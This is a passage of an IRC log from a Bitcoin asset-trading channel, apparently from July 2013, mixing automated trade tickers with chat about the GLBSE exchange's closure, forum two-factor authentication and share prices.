[COGNITIVE] 1 @ 0.565001 BTC [-] Jul 14 19:59:55 [BTCTC] [COGNITIVE] 3 @ 0.565 = 1.695 BTC [-] Jul 14 20:00:55 [BTCTC] [BTC-BOND] 12 @ 0.009996 = 0.12 BTC [+] Jul 14 20:01:01 "Not to troll, but you're all idiots! I'll build my own exchange, with blackjack and hookers!" Jul 14 20:01:48 nah, mpex onl;y came along much later. Jul 14 20:02:59 It was more for the reference than anything. Jul 14 20:03:06 it irks me how some people are scared to use me for AM escrows Jul 14 20:03:17 wtf do i want with their 20btc Jul 14 20:03:28 ... Jul 14 20:03:36 But you're running a AM passthrough... Jul 14 20:03:40 right Jul 14 20:06:45 [BTCTC] [BASIC-MINING] 1 @ 0.67001 BTC [+] Jul 14 20:07:16 [BTCTC] [BASIC-MINING] 10 @ 0.67001 = 6.7001 BTC [+] Jul 14 20:09:47 ThickAsThieves: You call it making assumptions, I call it making inductions. Jul 14 20:09:51 :D Jul 14 20:10:35 [BTCTC] [TAT.VIRTUALMINE] 39 @ 0.0042 = 0.1638 BTC [+] Jul 14 20:12:03 not deductions? Jul 14 20:12:26 [BTCTC] [BASIC-MINING] 1 @ 0.67001 BTC [+] Jul 14 20:12:59 [HAVELOCK] [VTX] 1 @ 0.65 BTC [+] Jul 14 20:14:06 [MPEX] [S.MPOE] 17754 @ 0.00092174 = 16.3646 BTC [-] Jul 14 20:15:40 inflections Jul 14 20:15:50 In case any of you wanna join me: https://bitcointalk.org/index.php?topic=254955.0 Jul 14 20:15:55 "2-factor authentication for the forum" Jul 14 20:18:07 might less virus urls through pm on hacked accounts. so i am game :) Jul 14 20:18:37 add a poll on it, better stats Jul 14 20:20:24 seems kinda obvious to me Jul 14 20:20:33 is a poll really needed? Jul 14 20:20:48 it's more like why the hell doesn't 2fa exist already Jul 14 20:20:55 [BTCTC] [DMS.PURCHASE] 25 @ 0.040172 = 1.0043 BTC [-] Jul 14 20:20:56 depends if the forum "owner" uses time to read or not :) Jul 14 20:22:37 [BTCTC] [AMC-PT] 12 @ 0.0025 = 0.03 BTC [+] Jul 14 20:23:11 [BTCTC] [B.YABMC] 1 @ 0.002499 BTC [-] Jul 14 20:23:43 ah ok, the VIP status on the forums is purchased, not earned Jul 14 20:23:45 50btc! Jul 14 20:24:38 [BTCTC] [DMS.SELLING] 38 @ 0.025737 = 0.978 BTC [+] Jul 14 20:24:46 [BTCTC] [B.YABMC] 160 @ 0.0025 = 0.4 BTC [+] Jul 14 20:25:02 you bought it? Jul 14 20:25:08 nah Jul 14 20:25:40 would be cool to get both Vip and scammer, and you become a VIP scammer ;) Jul 14 20:25:42 haha Jul 14 20:25:54 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jul 14 20:25:58 tempting sure, but buying VIP at this point is like paying for a Scammer tag Jul 14 20:26:33 maybe if i had more coins than I knew what do with Jul 14 20:26:56 but there's so many better things to do with em Jul 14 20:26:56 yea, i dont have a problem giving out a 1btc now and then. but 50.. Jul 14 20:27:03 then it becomes hurtmoney Jul 14 20:27:57 [BTCTC] [AMC-PT] 700 @ 0.0025 = 1.75 BTC [+] Jul 14 20:28:25 [HAVELOCK] [VTX] 1 @ 0.65 BTC [+] Jul 14 20:28:41 [BTCTC] [TAT.ASICMINER] 60 @ 0.0412 = 2.472 BTC [-] Jul 14 20:28:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.042 BTC [+] Jul 14 20:29:24 reading the GLBSE / MPEX comparison post Jul 14 20:29:42 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [+] Jul 14 20:29:50 Bankruptcies GLBSE:Twenty MPEX:0 Jul 14 20:29:50 Symbols suspended or abandoned GLBSE:Tens MPEX:0. Jul 14 20:29:56 MPEX sucks balls, look they doent even have css, what year is this 1990? Jul 14 20:30:04 [BTCTC] [AMC-PT] 51 @ 0.0025 = 0.1275 BTC [+] Jul 14 20:30:06 [HAVELOCK] [SDSTM] 36 @ 0.0082 = 0.2952 BTC [-] Jul 14 20:30:16 [HAVELOCK] [SDSTM] 10 @ 0.0081 = 0.081 BTC [-] Jul 14 20:31:20 [BTCTC] [AMC-PT] 980 @ 0.0025 = 2.45 BTC [+] Jul 14 20:31:35 [BTCTC] [AMC-PT] 350 @ 0.0025 = 0.875 BTC [+] Jul 14 20:33:12 [BTCTC] [AMC-PT] 65 @ 0.0025 = 0.1625 BTC [+] Jul 14 20:34:01 [BTCTC] [COGNITIVE] 1 @ 0.565001 BTC [+] Jul 14 20:35:46 [BTCTC] [COGNITIVE] 1 @ 0.565 BTC [-] Jul 14 20:35:53 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 14 20:39:34 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0042 BTC [+] Jul 14 20:39:59 tempting sure, but buying VIP at this point is like paying for a Scammer tag <<< lol truer words... Jul 14 20:40:21 kakobreklaa werd. Jul 14 20:42:14 [BTCTC] [TAT.ASICMINER] 50 @ 0.041202 = 2.0601 BTC [-] Jul 14 20:44:34 in this conversation: http://trilema.com/2012/conversation-discarded-as-worthless/ Jul 14 20:44:43 is BTC-Mining someone that is still around? Jul 14 20:47:32 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.0042 = 0.0336 BTC [+] Jul 14 20:47:50 [MPEX] [S.MG] 4726 @ 0.00019 = 0.8979 BTC [+] Jul 14 20:47:52 [MPEX] [S.MG] 274 @ 0.00021 = 0.0575 BTC [+] Jul 14 20:48:31 [BTCTC] [ASICMINER-PT] 1 @ 4.249999 BTC [+] Jul 14 20:48:37 [BTCTC] [S.DICE-PT] 1 @ 0.002368 BTC [+] Jul 14 20:49:34 That's me. Jul 14 20:50:34 yeah Namworld, artist formerly known as btc-mining Jul 14 20:50:44 [HAVELOCK] [AM100] 120 @ 0.040997 = 4.9196 BTC [-] Jul 14 20:50:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.041945 = 0.0839 BTC [+] Jul 14 20:51:05 word Jul 14 20:51:14 i'm only halfway thru Jul 14 20:51:31 seems to be the same sentences rewritten 50 ways Jul 14 20:52:15 It pretty much is, I suppose. Jul 14 20:52:17 [MPEX] [S.MPOE] 12750 @ 0.00090801 = 11.5771 BTC [-] Jul 14 20:55:22 Eventually the data got out... Jul 14 20:55:53 There was another argument about claiming the Gigamining shares, which mircea systematically refused. Jul 14 20:56:06 [MPEX] [S.MPOE] 5000 @ 0.00090801 = 4.5401 BTC [-] Jul 14 20:56:32 how long after the deadline was the data released? Jul 14 20:57:03 more specifically why wasn't it released the week people wanted it in the first place? Jul 14 20:58:55 I don't remember. Because Nefario is slow as heck. Jul 14 20:59:07 it was released just as soon as all the falsification could be done Jul 14 20:59:10 3-4 months later. Jul 14 20:59:23 "slow" doesn't enter into it, he closed glbse within 5 minutes. Jul 14 21:00:00 I received all my balances as well as all my shares without any error, oddly enough. Some apparently didn't get their things right. Jul 14 21:00:19 Either way, he could have just dumped the whole database. Jul 14 21:00:43 selective scamming is called selective for a reason. Jul 14 21:01:01 Yeah Jul 14 21:02:13 yeah that really seems to be the truth of it. if you are alive and able to copy the list, take the damn 10 minutes to do so Jul 14 21:02:19 [MPEX] [S.MPOE] 7700 @ 0.00091798 = 7.0684 BTC [+] Jul 14 21:02:20 [MPEX] [S.MPOE] 31698 @ 0.00092049 = 29.1777 BTC [+] Jul 14 21:02:27 not doing so means he needed more time to do something Jul 14 21:02:46 like scam Jul 14 21:03:11 or maybe work with feds to explain everyone on the list! Jul 14 21:03:38 [BTCTC] [B.YABMC] 100 @ 0.0025 = 0.25 BTC [+] Jul 14 21:03:50 has anyone ever actually been to court for anything bitcoin-asset related ever? Jul 14 21:03:59 probably not Jul 14 21:04:08 or even sued? Jul 14 21:04:36 [HAVELOCK] [AM100] 3 @ 0.040401 = 0.1212 BTC [-] Jul 14 21:04:40 ThickAsThieves patrick harnett had a series of board hearings Jul 14 21:04:41 [HAVELOCK] [AM100] 5 @ 0.0404 = 0.202 BTC [-] Jul 14 21:04:44 afaik the closest it gets to a court. Jul 14 21:04:46 [HAVELOCK] [AM100] 1 @ 0.0403 BTC [-] Jul 14 21:04:58 anyway, read the shareholders on welfare article, it relates to the glbse event Jul 14 21:04:59 [HAVELOCK] [AM100] 1 @ 0.040003 BTC [-] Jul 14 21:05:50 [MPEX] [S.MPOE] 3850 @ 0.00090801 = 3.4958 BTC [-] Jul 14 21:05:51 [MPEX] [S.MPOE] 20500 @ 0.00088426 = 18.1273 BTC [-] Jul 14 21:06:05 [MPEX] [S.MPOE] 19528 @ 0.00088278 = 17.2389 BTC [-] Jul 14 21:06:07 [MPEX] [S.MPOE] 122 @ 0.00085 = 0.1037 BTC [-] Jul 14 21:09:53 So much of that discussion could have been avoided if I didn't miss a line. Jul 14 21:10:30 I did complain a lot about mircea refusing to claim with Gigavps afterward, however. Jul 14 21:10:32 anyone seen S.MG's game yet? or why so many buys today? Jul 14 21:11:06 I don't think there's even a preview yet for MG Jul 14 21:12:00 in during mp talkings about lolis Jul 14 21:13:21 What? talking about the game? Jul 14 21:13:25 There's too much lolis in games already. Surely this game won't have any? Jul 14 21:15:08 FabianB nobody's seen it afaik. Jul 14 21:15:11 !ticker m s.mg Jul 14 21:15:13 [MPEX:S.MG] 1D: 0.00017 / 0.00017636 / 0.00021 (85432 shares, 15.07 BTC), 7D: 0.00013 / 0.00017178 / 0.00021 (113432 shares, 19.49 BTC), 30D: 0.0001 / 0.00015296 / 0.00021 (222726 shares, 34.07 BTC) Jul 14 21:15:14 [BTCTC] [TAT.VIRTUALMINE] 377 @ 0.0042 = 1.5834 BTC [+] Jul 14 21:15:25 [BTCTC] [TAT.VIRTUALMINE] 38 @ 0.0042 = 0.1596 BTC [+] Jul 14 21:15:26 wow 17 huh Jul 14 21:15:32 [MPEX] [S.MPOE] 4878 @ 0.00085 = 4.1463 BTC [-] Jul 14 21:17:55 [HAVELOCK] [SDSTM] 3 @ 0.00763 = 0.0229 BTC [-] Jul 14 21:18:01 [HAVELOCK] [SDSTM] 4 @ 0.00762 = 0.0305 BTC [-] Jul 14 21:18:06 [HAVELOCK] [SDSTM] 3 @ 0.007611 = 0.0228 BTC [-] Jul 14 21:18:12 [HAVELOCK] [SDSTM] 10 @ 0.00761 = 0.0761 BTC [-] Jul 14 21:18:18 [HAVELOCK] [SDSTM] 28 @ 0.00760001 = 0.2128 BTC [-] Jul 14 21:19:40 reading this, http://trilema.com/2012/the-stockexchange-shareholders-on-welfare/, am I crazy for thinking nefario's decision to close out of fear, and not commit further "risky" acts (like selling the exchange of handing over the keys), are not necessarily absurd? Jul 14 21:19:53 of=or Jul 14 21:20:18 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jul 14 21:20:54 crazy is a relative term. Jul 14 21:21:01 for my own needs i'm satisfied he had a bout of paranoia. Jul 14 21:21:30 this is one of the reasons you don't want unqualified random douches running any sort of service. they chaff. Jul 14 21:21:39 bitcoin is after all war. Jul 14 21:24:25 [BTCTC] [COGNITIVE] 1 @ 0.565 BTC [-] Jul 14 21:24:27 [BTCTC] [COGNITIVE] 1 @ 0.55 BTC [-] Jul 14 21:24:28 [BTCTC] [COGNITIVE] 3 @ 0.54698 = 1.6409 BTC [-] Jul 14 21:24:53 [BTCTC] [BASIC-MINING] 1 @ 0.670002 BTC [-] Jul 14 21:25:20 [BTCTC] [BASIC-MINING] 1 @ 0.670001 BTC [-] Jul 14 21:26:19 [BTCTC] [COGNITIVE] 1 @ 0.490093 BTC [-] Jul 14 21:27:50 [BTCTC] [DMS.MINING] 1 @ 0.015729 BTC [-] Jul 14 21:28:01 [BTCTC] [GSDPT] 15 @ 0.00195 = 0.0293 BTC [-] Jul 14 21:28:02 [BTCTC] [GSDPT] 38 @ 0.001913 = 0.0727 BTC [-] Jul 14 21:29:17 [BTCTC] [COG.F] 1 @ 5.9 BTC [+] Jul 14 21:29:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.041936 BTC [-] Jul 14 21:34:59 [BTCTC] [ASICMINER-PT] 1 @ 4.230001 BTC [-] Jul 14 21:39:54 my favorite old post so far: http://trilema.com/2012/what-does-a-start-up-run-on/ Jul 14 21:41:35 this is good too: http://trilema.com/2012/tru-story/ Jul 14 21:41:40 [BTCTC] [B.YABMC] 100 @ 0.0025 = 0.25 BTC [+] Jul 14 21:44:41 ;;bcstats Jul 14 21:44:44 Current Blocks: 246564 | Current Difficulty: 2.61628756825699E7 | Next Difficulty At Block: 247967 | Next Difficulty In: 1403 blocks | Next Difficulty In About: 1 week, 1 day, 12 hours, 4 minutes, and 21 seconds | Next Difficulty Estimate: 29715273.9267 | Estimated Percent Change: 13.57801 Jul 14 21:45:40 smickles when did you get out Jul 14 21:46:01 wait Jul 14 21:46:03 smickles is back? Jul 14 21:46:04 out? Jul 14 21:46:09 ;;ticker Jul 14 21:46:09 MtGox BTCUSD ticker | Best bid: 95.61198, Best ask: 95.61201, Bid-ask spread: 0.00003, Last trade: 95.61197, 24 hour volume: 17440.88338574, 24 hour low: 93.10000, 24 hour high: 99.00000, 24 hour vwap: 96.30838 Jul 14 21:46:20 [BTCTC] [AMC-PT] 160 @ 0.0025 = 0.4 BTC [+] Jul 14 21:46:36 the last option i had expired in april, i think Jul 14 21:46:45 but i haven't gotten out Jul 14 21:47:33 ... i did sell enough to buy a new car at 220 tho Jul 14 21:50:13 [BTCTC] [ASICMINER-PT] 1 @ 4.249999 BTC [+] Jul 14 21:53:11 smickles it's an expression. "when did you get out [of prison]" Jul 14 21:54:26 funny, it felt like something flew over my head Jul 14 21:54:32 [BTCTC] [BASIC-MINING] 1 @ 0.655001 BTC [-] Jul 14 21:55:45 [BTCTC] [TAT.ASICMINER] 26 @ 0.04193 = 1.0902 BTC [-] Jul 14 21:55:48 [BTCTC] [TAT.ASICMINER] 50 @ 0.041931 = 2.0966 BTC [+] Jul 14 21:55:50 [BTCTC] [TAT.ASICMINER] 3 @ 0.041947 = 0.1258 BTC [+] Jul 14 21:58:39 [BTCTC] [ASICMINER-PT] 1 @ 4.230001 BTC [-] Jul 14 21:59:28 [BTCTC] [ASICMINER-PT] 5 @ 4.23 = 21.15 BTC [-] Jul 14 22:00:23 just a fancy way of asking what have you been up to Jul 14 22:01:04 well, taking care of two kids of my own, and the odd one of another Jul 14 22:01:34 wife's coworker's wife "having trouble" Jul 14 22:01:57 ha! Jul 14 22:02:12 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 14 22:02:16 [BTCTC] [TAT.ASICMINER] 29 @ 0.042343 = 1.2279 BTC [+] Jul 14 22:02:29 I believe the common local phrase is 'bitch be crazy' Jul 14 22:03:28 [BTCTC] [RSM] 3 @ 0.02 = 0.06 BTC [+] Jul 14 22:04:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.042339 = 0.2117 BTC [-] Jul 14 22:05:15 ^ Jul 14 22:05:26 ^ Jul 14 22:05:30 the troll actually says a thoughtful thing for a change Jul 14 22:13:13 [BTCTC] [S.DICE-PT] 8 @ 0.002368 = 0.0189 BTC [+] Jul 14 22:16:02 DiabloD3 aint a troll Jul 14 22:16:37 Scrat: yeah he's a pretty crappy one at that Jul 14 22:20:42 as an fyi, theymos' policy on sharing PMs: https://bitcointalk.org/index.php?topic=255986.msg2729483#msg2729483 Jul 14 22:21:22 [HAVELOCK] [AM100] 110 @ 0.0406 = 4.466 BTC [+] Jul 14 22:21:32 "use gpg and stfu" ? Jul 14 22:21:39 [BTCTC] [ASICMINER-PT] 4 @ 4.249999 = 17 BTC [+] Jul 14 22:22:07 PM = Personal, not Private Jul 14 22:23:58 [HAVELOCK] [AM100] 1 @ 0.04059 BTC [-] Jul 14 22:24:39 https://bitcointalk.org/index.php?topic=255136.msg2719425#msg2719425 Jul 14 22:24:45 [ANN] Bitcoin Foundation Board Election Details Announced Jul 14 22:24:45 [ANN] Bitcoin Foundation Board Election Details Announced Jul 14 22:24:51 oops Jul 14 22:25:21 i thought Scrat has echo'd ozbot into oblivion or something Jul 14 22:25:25 had Jul 14 22:25:50 it's gribble Jul 14 22:25:54 it has an echo limit Jul 14 22:25:59 smart supybot Jul 14 22:28:35 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jul 14 22:30:20 [HAVELOCK] [AM100] 66 @ 0.0406 = 2.6796 BTC [+] Jul 14 22:31:51 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 14 22:32:48 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 14 22:33:29 [HAVELOCK] [AM100] 239 @ 0.0406 = 9.7034 BTC [+] Jul 14 22:33:32 [BTCTC] [AMC-PT] 80 @ 0.0025 = 0.2 BTC [+] Jul 14 22:33:48 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 14 22:34:07 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [+] Jul 14 22:36:26 [HAVELOCK] [AM100] 132 @ 0.040997 = 5.4116 BTC [+] Jul 14 22:36:31 [HAVELOCK] [AM100] 9 @ 0.04099799 = 0.369 BTC [+] Jul 14 22:36:37 [HAVELOCK] [AM100] 239 @ 0.04099999 = 9.799 BTC [+] Jul 14 22:36:41 [HAVELOCK] [AM100] 3 @ 0.041 = 0.123 BTC [+] Jul 14 22:36:50 [HAVELOCK] [AM100] 800 @ 0.041 = 32.8 BTC [+] Jul 14 22:37:05 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Jul 14 22:37:40 [HAVELOCK] [AM100] 39 @ 0.040999 = 1.599 BTC [-] Jul 14 22:38:31 [HAVELOCK] [AM100] 81 @ 0.040999 = 3.3209 BTC [-] Jul 14 22:38:33 [HAVELOCK] [AM100] 99 @ 0.041 = 4.059 BTC [+] Jul 14 22:42:25 [BTCTC] [AMC-PT] 1300 @ 0.0025 = 3.25 BTC [+] Jul 14 22:44:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.042289 = 0.4229 BTC [-] Jul 14 22:44:18 [BTCTC] [TAT.ASICMINER] 19 @ 0.04229 = 0.8035 BTC [+] Jul 14 22:44:20 [BTCTC] [TAT.ASICMINER] 4 @ 0.042293 = 0.1692 BTC [+] Jul 14 22:45:15 [BTCTC] [TAT.ASICMINER] 7 @ 0.042338 = 0.2964 BTC [+] Jul 14 22:47:36 [BTCTC] [B.YABMC] 25 @ 0.0025 = 0.0625 BTC [+] Jul 14 22:50:09 [HAVELOCK] [AM100] 9 @ 0.040121 = 0.3611 BTC [-] Jul 14 22:50:48 [BTCTC] [ASICMINER-PT] 1 @ 4.249999 BTC [+] Jul 14 22:51:50 ;;seen mircea_popescu Jul 14 22:51:50 mircea_popescu was last seen in #bitcoin-assets 30 minutes and 16 seconds ago: "use gpg and stfu" ? Jul 14 22:53:26 ;;seen thestringpuller Jul 14 22:53:26 thestringpuller was last seen in #bitcoin-assets 1 minute and 36 seconds ago: ;;seen mircea_popescu Jul 14 22:55:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.042338 BTC [+] Jul 14 22:57:35 [BTCTC] [AMC-PT] 55 @ 0.0025 = 0.1375 BTC [+] Jul 14 23:02:32 [HAVELOCK] [SDSTM] 10 @ 0.0088 = 0.088 BTC [+] Jul 14 23:03:17 [HAVELOCK] [SDSTM] 202 @ 0.0089 = 1.7978 BTC [+] Jul 14 23:03:29 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 14 23:06:56 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 14 23:08:48 [BTCTC] [AMC-PT] 366 @ 0.0025 = 0.915 BTC [+] Jul 14 23:12:27 [BTCTC] [AMC-PT] 48 @ 0.0025 = 0.12 BTC [+] Jul 14 23:20:51 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jul 14 23:21:13 "Active Mining Shares Increase Profit Share From 10% To 40% " Jul 14 23:22:25 [MPEX] [S.MPOE] 19743 @ 0.000792 = 15.6365 BTC [-] Jul 14 23:22:27 [MPEX] [S.MPOE] 257 @ 0.00081766 = 0.2101 BTC [+] Jul 14 23:23:05 [HAVELOCK] [AM100] 23 @ 0.040151 = 0.9235 BTC [+] Jul 14 23:23:34 lol Jul 14 23:25:46 [BTCTC] [AMC-PT] 300 @ 0.0025 = 0.75 BTC [+] Jul 14 23:27:00 [BTCTC] [ASICMINER-PT] 3 @ 4.25 = 12.75 BTC [+] Jul 14 23:27:45 ...huh, at some point in time, usagi sent btc to the s²cm wallet Jul 14 23:27:49 dunno why Jul 14 23:27:51 [HAVELOCK] [SDSTM] 2 @ 0.0089 = 0.0178 BTC [+] Jul 14 23:28:02 [BTCTC] [BASIC-MINING] 1 @ 0.67001 BTC [+] Jul 14 23:29:35 [BTCTC] [AMC-PT] 155 @ 0.0025 = 0.3875 BTC [+] Jul 14 23:31:59 [BTCTC] [ASICMINER-PT] 5 @ 4.25 = 21.25 BTC [+] Jul 14 23:32:46 [BTCTC] [GSDPT] 15 @ 0.00225 = 0.0338 BTC [+] Jul 14 23:33:59 [BTCTC] [GSDPT] 168 @ 0.00227 = 0.3814 BTC [+] Jul 14 23:34:17 [BTCTC] [COGNITIVE] 1 @ 0.569899 BTC [+] Jul 14 23:34:40 [BTCTC] [GSDPT] 45 @ 0.002295 = 0.1033 BTC [+] Jul 14 23:34:51 [BTCTC] [COGNITIVE] 1 @ 0.5699 BTC [+] Jul 14 23:38:41 [BTCTC] [BITVPS] 371 @ 0.001761 = 0.6533 BTC [+] Jul 14 23:38:43 [BTCTC] [BITVPS] 60 @ 0.00176 = 0.1056 BTC [-] Jul 14 23:38:44 [BTCTC] [BITVPS] 250 @ 0.001757 = 0.4393 BTC [-] Jul 14 23:38:46 [BTCTC] [BITVPS] 2 @ 0.00175 = 0.0035 BTC [-] Jul 14 23:38:47 [BTCTC] [BITVPS] 500 @ 0.001746 = 0.873 BTC [-] Jul 14 23:38:48 [BTCTC] [BITVPS] 1125 @ 0.001746 = 1.9643 BTC [-] Jul 14 23:38:55 [BTCTC] [AMC-PT] 25 @ 0.0025 = 0.0625 BTC [+] Jul 14 23:42:06 [BTCTC] [DMS.PURCHASE] 2 @ 0.040172 = 0.0803 BTC [-] Jul 14 23:44:19 [BTCTC] [AMC-PT] 105 @ 0.0025 = 0.2625 BTC [+] Jul 14 23:44:54 [HAVELOCK] [AM100] 1 @ 0.04032 BTC [+] Jul 14 23:45:00 [HAVELOCK] [AM100] 7 @ 0.04015209 = 0.2811 BTC [-] Jul 14 23:48:46 [BTCTC] [AMC-PT] 40 @ 0.0025 = 0.1 BTC [+] Jul 14 23:51:35 [BTCTC] [AMC-PT] 60 @ 0.0025 = 0.15 BTC [+] Jul 14 23:51:49 [MPEX] [S.MPOE] 10806 @ 0.00079998 = 8.6446 BTC [-] Jul 15 00:06:08 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00423 BTC [+] Jul 15 00:07:51 [BTCTC] [TAT.VIRTUALMINE] 14 @ 0.00423 = 0.0592 BTC [+] Jul 15 00:07:52 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.0044 = 0.0396 BTC [+] Jul 15 00:07:53 [BTCTC] [TAT.VIRTUALMINE] 500 @ 0.0044 = 2.2 BTC [+] Jul 15 00:08:00 [BTCTC] [BASIC-MINING] 22 @ 0.67001 = 14.7402 BTC [+] Jul 15 00:08:41 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.004439 = 0.8878 BTC [+] Jul 15 00:09:13 [BTCTC] [DMS.MINING] 2 @ 0.01625 = 0.0325 BTC [+] Jul 15 00:10:20 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004448 BTC [+] Jul 15 00:15:21 [MPEX] [S.MG] 11726 @ 0.00021 = 2.4625 BTC [+] Jul 15 00:17:40 [16:21] "Active Mining Shares Increase Profit Share From 10% To 40% " <<<< It's a Christmas miracle! Jul 15 00:19:38 [HAVELOCK] [SDSTM] 23 @ 0.0094 = 0.2162 BTC [+] Jul 15 00:21:05 [BTCTC] [B.YABMC] 50 @ 0.0025 = 0.125 BTC [+] Jul 15 00:30:36 [BTCTC] [TAT.ASICMINER] 52 @ 0.0423 = 2.1996 BTC [-] Jul 15 00:30:40 [BTCTC] [TAT.ASICMINER] 26 @ 0.042001 = 1.092 BTC [-] Jul 15 00:30:49 [HAVELOCK] [AM100] 59 @ 0.0406 = 2.3954 BTC [+] Jul 15 00:30:50 [HAVELOCK] [AM100] 10 @ 0.04099088 = 0.4099 BTC [+] Jul 15 00:30:52 [HAVELOCK] [AM100] 9 @ 0.04099088 = 0.3689 BTC [+] Jul 15 00:31:05 [BTCTC] [RSM] 1 @ 0.019999 BTC [-] Jul 15 00:31:07 [BTCTC] [RSM] 44 @ 0.02 = 0.88 BTC [+] Jul 15 00:31:08 [BTCTC] [RSM] 50 @ 0.02 = 1 BTC [+] Jul 15 00:31:10 [BTCTC] [RSM] 50 @ 0.02 = 1 BTC [+] Jul 15 00:31:31 [BTCTC] [RSM] 100 @ 0.02 = 2 BTC [+] Jul 15 00:31:50 [BTCTC] [BASIC-MINING] 2 @ 0.675 = 1.35 BTC [+] Jul 15 00:32:55 [BTCTC] [DMS.MINING] 1 @ 0.01625 BTC [+] Jul 15 00:34:46 [BTCTC] [AMC-PT] 240 @ 0.0025 = 0.6 BTC [+] Jul 15 00:34:48 hi all, no comment on today S.MPOE freakout? Jul 15 00:35:23 it needed correcting no? Jul 15 00:36:47 [HAVELOCK] [SDSTM] 1 @ 0.00939999 BTC [-] Jul 15 00:38:05 [MPEX] [S.MPOE] 23072 @ 0.00081766 = 18.8651 BTC [+] Jul 15 00:38:17 nice, havent noticed Jul 15 00:40:15 yes, sold some at 94, helped me cover the lossy iDiff-O payout nicely Jul 15 00:41:47 freenode again under attack? can't auth my nick Jul 15 00:42:49 mkay Jul 15 00:42:49 [BTCTC] [BASIC-MINING] 1 @ 0.67001 BTC [-] Jul 15 00:43:28 mpex used to list index futures? Jul 15 00:43:30 http://trilema.com/2012/futures-simply-put/ Jul 15 00:43:35 Futures, simply put pe Trilema - Un blog de Mircea Popescu. Jul 15 00:44:50 there was a active bid at 94 or you had an ask? Jul 15 00:46:31 [BTCTC] [AMC-PT] 80 @ 0.0025 = 0.2 BTC [+] Jul 15 00:47:29 [BTCTC] [RSM] 30 @ 0.022 = 0.66 BTC [+] Jul 15 00:49:06 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [+] Jul 15 00:51:57 2:11:43 Diablo-D3: Ill trade you 2080 asicminer for 4160 obsi.abmo Jul 15 00:52:05 hehe http://trilema.com/2012/lolvacute-pentru-posteritate/ Jul 15 00:52:36 [MPEX] [S.MPOE] 1000 @ 0.00081766 = 0.8177 BTC [+] Jul 15 00:53:34 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 15 01:07:32 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 15 01:08:48 ThickAsThieves: https://bitcointalk.org/index.php?topic=130082.0 Jul 15 01:09:15 thx Jul 15 01:09:30 ive been catching up on my history all day Jul 15 01:12:51 there was also very interesting discussion here about possible futures with delivery Jul 15 01:13:15 but that was before log Jul 15 01:14:04 [MPEX] [S.MG] 250 @ 0.000245 = 0.0613 BTC [+] Jul 15 01:14:06 [MPEX] [S.MG] 9000 @ 0.00016222 = 1.46 BTC [-] Jul 15 01:14:08 [MPEX] [S.MG] 25000 @ 0.00016 = 4 BTC [-] Jul 15 01:14:09 [MPEX] [S.MG] 10000 @ 0.00014 = 1.4 BTC [-] Jul 15 01:14:20 [MPEX] [S.MG] 750 @ 0.00013 = 0.0975 BTC [-] Jul 15 01:15:17 i see that mircea also offered to buy GLBSE Jul 15 01:15:44 where? if it's true, i completely forgot about that Jul 15 01:16:54 https://bitcointalk.org/index.php?topic=77343.msg930030#msg930030 Jul 15 01:16:59 [GLBSE] BDK -- LIQUIDATING UNDER NEGATIVE EQUITY PROVISION -- Jul 15 01:17:15 or is that just for BDK? Jul 15 01:17:23 it was for glbse, but back in april. Jul 15 01:17:33 back then people somehow thought nonsense works, magically. Jul 15 01:18:29 oh these days of St.Nefario Jul 15 01:18:36 the more i read, the more i question why the fuck some things and people are still listed Jul 15 01:18:45 this is why reading is good. Jul 15 01:20:01 it's a lot to take in, I'm trying to be thorough but it still feels like I'm missing so much Jul 15 01:20:15 trilema is mainly where i'm working out of Jul 15 01:20:38 ive done a fair amount of reading in the forums of their months Jul 15 01:20:45 but i'm sure there's a ton more there too Jul 15 01:20:46 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 15 01:20:51 [HAVELOCK] [AM100] 1 @ 0.0404 BTC [-] Jul 15 01:20:56 [HAVELOCK] [AM100] 1 @ 0.04039 BTC [-] Jul 15 01:20:59 [BTCTC] [AMC-PT] 30 @ 0.0025 = 0.075 BTC [+] Jul 15 01:21:17 getting pretty tired of this cigar photo Jul 15 01:21:19 :) Jul 15 01:21:26 they change with the seasons Jul 15 01:25:33 [18:08] ThickAsThieves: https://bitcointalk.org/index.php?topic=130082.0 <<< first response is a passive-aggressive scam accusation. 7 months later we've progressed to them being aggressively self-righteous. Jul 15 01:28:05 there's a long trail of butthurt wrecks in her wake. Jul 15 01:29:02 Why did the futures go away, no action? Jul 15 01:29:57 No one ever takes my challenge. Jul 15 01:30:05 [BTCTC] [DMS.PURCHASE] 89 @ 0.040172 = 3.5753 BTC [-] Jul 15 01:30:23 of? Jul 15 01:30:58 [BTCTC] [AMC-PT] 6750 @ 0.0025 = 16.875 BTC [+] Jul 15 01:31:02 ThickAsThieves yeah Jul 15 01:31:31 ppl have this issue whereby "omg please implement X we'd 